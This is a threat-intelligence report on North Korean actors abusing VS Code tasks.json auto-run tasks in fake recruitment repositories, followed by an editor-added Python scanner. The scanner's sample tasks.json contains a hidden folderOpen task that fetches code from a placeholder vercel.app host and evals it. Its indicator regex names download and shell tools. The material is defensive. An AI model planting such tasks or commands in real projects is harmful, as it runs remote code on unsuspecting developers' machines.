
Threat Actors Expand Abuse of Microsoft Visual Studio Code

· Published 21/01/2026 12:38 · Modified 21/01/2026 23:19


Essential information

Tags: 2026-01-21, backdoor, c2, contagious interview, github, gitlab, javascript, macos, node.js, visual studio code
Related entities: 8 observables, 1 intrusion set (APT), 11 techniques (MITRE), 1 other

Description

North Korean threat actors behind the Contagious Interview campaign have evolved their tradecraft and now abuse Visual Studio Code task configuration files (.vscode/tasks.json). The infection chain begins when a victim opens a malicious Git repository in VS Code, often disguised as part of a recruitment process. If the user grants the workspace trust when VS Code prompts for it, the tasks defined in the repository run and execute arbitrary commands on the system. The malware retrieves its payloads from infrastructure hosted on vercel.app; the retrieved code implements remote code execution, system fingerprinting, and persistent command-and-control communication. The backdoor collects host information and beacons to its server every five seconds. Recent observations show further execution of similar payloads, indicating ongoing development of these tactics.
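Worked example (added by the editor; not code from the original report and not the actors' tooling): a scanner for the VS Code mechanism described above. VS Code starts a task on its own when a folder is opened in a trusted workspace if the task carries "runOptions": {"runOn": "folderOpen"}, so a review of an untrusted repository should parse .vscode/tasks.json and flag every such task before the folder is opened in the editor. The sample tasks.json, the indicator list and the placeholder hostname below are constructed for illustration and are not indicators taken from the report.

```python
import json
import re

# Constructed sample .vscode/tasks.json in the style the report describes: a task
# that VS Code starts by itself once the folder is opened in a trusted workspace.
# The command and the hostname are placeholders, not indicators from the report.
SAMPLE_TASKS_JSON = r'''{
  // helper tasks for the take-home assignment
  "version": "2.0.0",
  "tasks": [
    {
      "label": "install deps",
      "type": "shell",
      "command": "npm install",
      "runOptions": { "runOn": "folderOpen" },
    },
    {
      "label": "dev server",
      "type": "shell",
      "command": "node -e \"require('https').get('https://example-placeholder.vercel.app/s',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
    {
      "label": "test",
      "type": "shell",
      "command": "npm test"
    }
  ]
}'''

# Illustrative indicator list (assumption, not from the report): download
# helpers, inline script execution, and the hosting domain named in the report.
SUSPICIOUS = re.compile(
    r"(curl|wget|invoke-webrequest|node\s+-e|eval\(|base64|"
    r"\.vercel\.app|/dev/tcp|powershell|bash\s+-c)",
    re.IGNORECASE,
)


def strip_jsonc(text: str) -> str:
    """Turn VS Code's JSON-with-comments into strict JSON.

    VS Code accepts // and /* */ comments and trailing commas in tasks.json;
    json.loads does not. A plain regex would also eat the "//" inside a URL in a
    command string, so walk the text and leave string literals untouched.
    """
    out = []
    i, n = 0, len(text)
    in_string = False
    while i < n:
        ch = text[i]
        if in_string:
            out.append(ch)
            if ch == "\\" and i + 1 < n:      # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif ch == '"':
                in_string = False
            i += 1
        elif ch == '"':
            in_string = True
            out.append(ch)
            i += 1
        elif text.startswith("//", i):        # line comment: skip to end of line
            i = text.find("\n", i)
            if i == -1:
                i = n
        elif text.startswith("/*", i):        # block comment: skip to closing */
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(ch)
            i += 1
    # Drop trailing commas before a closing bracket or brace. This pass is not
    # string-aware, so a command containing ",}" would be mangled; acceptable here.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def parse_tasks_json(text: str) -> dict:
    """Parse a tasks.json file as VS Code would read it."""
    return json.loads(strip_jsonc(text))


def command_of(task: dict) -> str:
    """Flatten a task's command and args into one string for matching."""
    cmd = task.get("command", "")
    if isinstance(cmd, dict):                 # per-OS form: {"windows": ..., "linux": ...}
        cmd = " ".join(str(v) for v in cmd.values())
    args = task.get("args", [])
    return " ".join([str(cmd)] + [str(a) for a in args])


def find_autorun_tasks(tasks_json_text: str) -> list:
    """Return the tasks VS Code would run on folder open, each with a verdict."""
    data = parse_tasks_json(tasks_json_text)
    findings = []
    for task in data.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on != "folderOpen":
            continue
        cmd = command_of(task)
        # A task that hides its terminal is a second signal worth recording.
        hidden = (task.get("presentation") or {}).get("reveal") == "never"
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "hidden_terminal": hidden,
            "indicators": hits,
            "suspicious": bool(hits) or hidden,
        })
    return findings


if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"[{'SUSPICIOUS' if f['suspicious'] else 'ok'}] {f['label']}: {f['command'][:80]}")
```

Run it against a cloned repository's .vscode/tasks.json before opening the folder in VS Code, or refuse trust in the Workspace Trust dialog until the file has been read. Any folderOpen task deserves a look regardless of the indicator list, since the list above is illustrative and trivially evaded; and tasks.json is only one of the files under .vscode that can influence what the editor executes, so a full review should cover the whole directory.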

External references